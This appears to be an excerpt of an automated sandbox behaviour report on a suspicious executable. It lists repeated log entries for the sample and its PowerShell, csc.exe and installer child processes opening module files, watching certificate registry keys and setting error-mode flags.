Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior

Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\BT.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RN8HT.tmp\BT.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Downloads\BT.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
